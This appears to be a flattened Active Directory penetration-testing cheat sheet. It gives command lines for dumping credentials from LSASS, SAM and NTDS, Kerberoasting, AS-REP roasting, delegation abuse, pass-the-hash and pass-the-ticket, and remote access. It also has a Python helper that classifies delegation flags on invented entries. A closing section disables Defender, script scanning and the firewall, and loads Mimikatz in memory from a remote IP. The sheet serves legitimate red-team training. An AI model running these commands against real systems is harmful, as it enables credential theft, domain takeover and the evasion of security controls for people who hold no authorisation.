- Designed by : Youssef Saeed
- @y0u553f5433d
-
Icons
- PowerView
- Noisy
- Mimikatz
- Linux
- Rubeus
-
Dumping Credentials
-
Tools
-
mimikatz
- mimikatz.exe
- Invoke-Mimikatz.ps1
- SharpKatz.exe
- pypykatz
-
Creds in memory
(LSASS)
-
MimiKatz
- Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
-
CrackMapExec
- crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
-
procdump
- 1- Get-Process -Name lsass | select Id
2- .\procdump.exe -accepteula -ma <PID> lsass.dmp
-
lsassy
- lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
-
Local Creds
(SAM)
-
MimiKatz
- Invoke-Mimikatz -Command '"lsadump::sam"'
-
CrackMapExec
- crackmapexec smb <IP> -u <USER> -p <PASS> --sam
-
SecretDump
- 1- reg save HKLM\sam sam
2- reg save HKLM\system system
3- reg save HKLM\security security
- 4- impacket-secretsdump -sam sam -security security -system system LOCAL
-
Domain Creds
(ntds)
-
MimiKatz
- Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain.full> /all"'
-
CrackMapExec
- crackmapexec smb <IP> -u <USER> -p <PASS> --ntds
-
SecretDump
- impacket-secretsdump <domain>/<USER>:<PASS>@<IP>
-
Lateral Movement
-
Kerberoasting
-
Found SPN
-
Extract Hashes
- specific account
- Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
- Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
- impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
- all accounts
- Invoke-Kerberoast.ps1
- Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
- Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
- Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
- crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
- impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
- From memory to disk
- kerberos::list /export
-
Cracking Hashes
- John
- john --wordlist=<wordlist path> hashes.txt
- Hashcat
- hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
- Remove the port number from the SPN inside the hash (e.g. MSSQLSvc/host:1433 -> MSSQLSvc/host) if present before cracking
-
Set SPN
- Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
-
ASREPRoast
-
Dumping Hashes
-
specific account
- ASREPRoast.ps1
- Get-ASREPHash -UserName <USER> -Verbose
-
all accounts
- Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
- crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
- GetNPUsers
- with Creds
- impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
- with users
- impacket-GetNPUsers -dc-ip <IP> -usersfile users.txt -no-pass <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
-
Cracking Hashes
-
John
- john --wordlist=<wordlist path> hashes.txt
-
Hashcat
- hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
-
Kerberos Delegation
-
Unconstrained Delegation
-
Basic
- Dumping Tickets
- Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
- Using Tickets
- Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
-
Using Exploits
- Setup Ticket monitoring
- Rubeus.exe monitor /interval:5 /nowrap
- Running Exploit
- Printer Bug
- .\MS-RPRN.exe \\dc.domain.com \\VulnMachine.domain.com
- PetitPotam
- .\PetitPotam.exe <VulnPC> <DC>
- Using Tickets
- Rubeus.exe ptt /ticket:<base64 Ticket from monitoring>
-
Constrained Delegation
-
Have User's hash
- Using Mimi and Kekeo
- Request TGT
- kekeo# tgt::ask /user:<User> /domain:<Full.Domain.com> /rc4:<Hash>
- Request TGS
- kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:<cifs>/<PC.Domain.com>
- inject the ticket
- Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
- Using Rubeus
- Rubeus.exe s4u /user:websvc /aes256:<User's AES> /impersonateuser:Administrator /msdsspn:service/pc.domain.com /ptt
-
Have Computer's hash
- Using Mimi and Kekeo
- Request TGT
- kekeo# tgt::ask /user:<PC$> /domain:<Full.Domain.com> /rc4:<Computer Hash>
- Request TGS
- kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:cifs/<PC.Domain.com>
- inject the ticket
- Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
- Using Rubeus
- Rubeus.exe s4u /user:<PC$> /aes256:<Computer's AES> /impersonateuser:Administrator /msdsspn:service/PC.domain.com /ptt
-
Resource Based
- Set-ADComputer -Identity <TargetComputer> -PrincipalsAllowedToDelegateToAccount <YourPWNedHost$>
- Rubeus.exe s4u /user:<Pwned PC>$ /aes256:<PC$ aes256> /msdsspn:<SVC>/<SVCMachine> /impersonateuser:administrator /ptt
-
Enumeration
-
BloodHound Enum
-
BloodHound
-
SharpHound.ps1
- Invoke-BloodHound -CollectionMethod All
- Invoke-BloodHound -CollectionMethod All -ExcludeDCs
- PowerView Enum
-
Advanced Domain Enumeration
-
Local Admin Access
- Find-LocalAdminAccess -Verbose
- Find-WMILocalAdminAccess.ps1
- Find-PSRemotingLocalAdminAccess.ps1
-
Cleartext Passwords in the userPassword Attribute
- $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
-
Kerberoasting
-
Find SPNs
- Get-DomainUser -SPN | select samaccountname,serviceprincipalname
- impacket-GetUserSPNs -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD>
- Rubeus.exe kerberoast /stats
-
Set SPNs
- Make sure the user has no SPN yet
- Get-DomainUser -Identity <USER> | select serviceprincipalname
- Found ?
-
ASREPRoast
- Get-DomainUser -PreauthNotRequired -Verbose
- impacket-GetNPUsers -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
-
ASREPRoast.ps1
- Invoke-ASREPRoast -Verbose
-
Kerberos Delegation
-
Unconstrained
- Get-DomainComputer -Unconstrained | select name,logoncount,description,operatingsystem
- Found ?
-
Constrained
- Users Enum
- Get-DomainUser -TrustedToAuth | select samaccountname,logoncount,msds-allowedtodelegateto | fl
- Computers Enum
- Get-DomainComputer -TrustedToAuth | select name,logoncount,description,operatingsystem,msds-allowedtodelegateto | fl
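Added example (not part of the original cheat sheet): what the PowerView switches above actually test. -PreauthNotRequired and -Unconstrained are bitwise filters on userAccountControl; -TrustedToAuth is a presence check on msDS-AllowedToDelegateTo. The Python below decodes the same attributes from constructed LDAP-style entries and goes one step further than the commands: it separates Kerberos-only constrained delegation from protocol transition, tags domain controllers (always unconstrained, which is why -ExcludeDCs exists) and flags disabled accounts. The SAMPLE entries and account names are made up.

```python
"""Decode userAccountControl / msDS-AllowedToDelegateTo the way PowerView's
-PreauthNotRequired, -Unconstrained and -TrustedToAuth switches do.

Added example, not part of the original cheat sheet. SAMPLE is constructed;
the bit values and the LDAP matching-rule OID are the standard ones.
"""
from typing import Dict, List

ACCOUNTDISABLE                 = 0x0000002
NORMAL_ACCOUNT                 = 0x0000200
WORKSTATION_TRUST_ACCOUNT      = 0x0001000
SERVER_TRUST_ACCOUNT           = 0x0002000   # domain controller
TRUSTED_FOR_DELEGATION         = 0x0080000   # 524288   unconstrained delegation
DONT_REQ_PREAUTH               = 0x0400000   # 4194304  AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # 16777216 protocol transition

# The LDAP filters behind the PowerView switches (1.2.840.113556.1.4.803 = bitwise AND)
LDAP_FILTERS = {
    "asreproast":    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH})",
    "unconstrained": f"(userAccountControl:1.2.840.113556.1.4.803:={TRUSTED_FOR_DELEGATION})",
    "trustedtoauth": "(msds-allowedtodelegateto=*)",
}


def classify(entry: dict) -> List[str]:
    """Return the attack-relevant tags for one directory object."""
    uac = int(entry.get("userAccountControl", 0))
    tags: List[str] = []
    if uac & DONT_REQ_PREAUTH:
        tags.append("asreproast")
    if uac & TRUSTED_FOR_DELEGATION:
        # DCs always carry this bit; PowerView/SharpHound offer -ExcludeDCs for that reason
        tags.append("unconstrained-dc" if uac & SERVER_TRUST_ACCOUNT else "unconstrained")
    if entry.get("msDS-AllowedToDelegateTo"):
        # Without TRUSTED_TO_AUTH the account only has Kerberos-only constrained
        # delegation: S4U2Self yields a non-forwardable ticket, so the Rubeus
        # s4u /impersonateuser path does not work on its own.
        tags.append("constrained-protocol-transition"
                    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION
                    else "constrained-kerberos-only")
    if tags and uac & ACCOUNTDISABLE:
        tags.append("disabled")   # KDC rejects disabled principals; not usable as-is
    return tags


def enumerate_delegation(entries) -> Dict[str, List[str]]:
    """sAMAccountName -> tags, for every entry that has at least one tag."""
    result: Dict[str, List[str]] = {}
    for e in entries:
        tags = classify(e)
        if tags:
            result[e["sAMAccountName"]] = tags
    return result


# Constructed directory entries (names and values are invented for the example).
SAMPLE = [
    {"sAMAccountName": "websvc",     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["CIFS/fs01.corp.local"]},
    {"sAMAccountName": "svc_kerb",   "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["HTTP/web01.corp.local"]},
    {"sAMAccountName": "DC01$",      "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "APP01$",     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "svc_legacy", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "old_svc",    "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "jdoe",       "userAccountControl": NORMAL_ACCOUNT},
]

if __name__ == "__main__":
    for sam, tags in enumerate_delegation(SAMPLE).items():
        print(f"{sam:12} {', '.join(tags)}")
```

Feed it real data by exporting the three attributes from LDAP (Get-DomainObject -Properties samaccountname,useraccountcontrol,msds-allowedtodelegateto); the "constrained-kerberos-only" tag is the case where the s4u commands above need a forwardable ticket from the victim rather than S4U2Self.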
-
Resource Based
- Find-InterestingDomainACL | ?{$_.identityreferencename -match '<USER>'}
- Found ?
- Important
- Requires write access over the target computer object (e.g. GenericAll, GenericWrite, WriteDacl or WriteOwner) to set msDS-AllowedToActOnBehalfOfOtherIdentity, plus control of an account with an SPN (typically a computer account you own); DA privileges are not required
-
Accessing
-
Have Legal Access ?
-
winrs
- winrs -r:<HOSTNAME> cmd
-
PsExec
- .\PsExec.exe \\<HOSTNAME> cmd
-
PS-Script
- 1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess
- Interactive
-
Script Block
- 1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}
-
WSManWinRM
- Invoke-WSManWinRM -hostname <HOST> -command cmd
-
Have Password ?
- winrs -r:<HOST> -u:<Domain>\<USER> -p:<PASS> cmd
- .\PsExec.exe -u <Domain>\<USER> -p <PASS> \\<HOSTNAME> cmd
- impacket-psexec <Domain>/<USER>:<PASS>@<IP>
-
WSManWinRM
- Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\<USER> -password <PASS>
- evil-winrm -i <IP> -u '<Domain>\<USER>' -p <PASS>
-
RDP Access
- rdesktop -a 16 <IP> -u <DOMAIN\USER> -p <PASS>
- xfreerdp /v:IP /u:"<USER>" /p:<PASS>
-
Pass The Hash (PTH)
- Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /ntlm:<NTLM> /run:powershell.exe"'
- impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
- evil-winrm -u <username> -H <Hash> -i <IP>
- pth-winexe -U <Domain>/<User>%<LM:NT> //<IP> cmd (LM part is aad3b435b51404eeaad3b435b51404ee when LM is disabled)
-
Impacket For Win
- .\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
-
Invoke-TheHash
- Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Domain> -Username <USER> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
- Require RDP
-
OverPass The Hash (OPTH)
OR
Pass The Key (PTK)
-
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
- .\PsExec.exe -accepteula \\<HOST> cmd
- winrs -r:<HOST> cmd
- Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'
- 1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
2- export KRB5CCNAME=$(pwd)/<USER>.ccache
3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
-
Pass The Ticket (PTT)
- Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
- Rubeus.exe ptt /ticket:<base64 Ticket>
-
Access
- .\PsExec.exe -accepteula \\<HOST> cmd
- winrs -r:<HOST> cmd
-
Gained Access
-
Have Reverse Shell?
-
Enable PS-Remoting
- powershell -ep bypass -c "Enable-PSRemoting -Force"
-
Enable RDP
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-
Security Bypass
-
PowerShell
-
Current Language Mode
- $ExecutionContext.SessionState.LanguageMode
-
Execution Policy Bypass
- powershell -ExecutionPolicy bypass
- powershell -c <cmd>
- powershell -EncodedCommand <base64 of UTF-16LE command>
- $env:PSExecutionPolicyPreference="bypass"
- Bypassed ?
-
AMSI
- AMSI Bypass PowerShell Command
-
Invisi-Shell
- If Administrator Access
- RunWithPathAsAdmin.bat
- If Not Administrator Access
- RunWithRegistryNonAdmin.bat
-
Importing your modules
-
Import Local file
- Import-Module .\PowerView.ps1
- . .\PowerUp.ps1
-
Import in memory
- powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz.ps1')"
-
Stop Security Controls
-
Defender
- 1- Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
2- Set-MpPreference -DisableIOAVProtection $true
-
Disable Defender Script Scanning (AMSI consumer)
- Set-MpPreference -DisableScriptScanning $true (turns off Defender's script scanning; AMSI itself stays loaded in the process)
-
Firewall
- 1- netsh firewall set opmode disable
2- netsh Advfirewall set allprofiles state off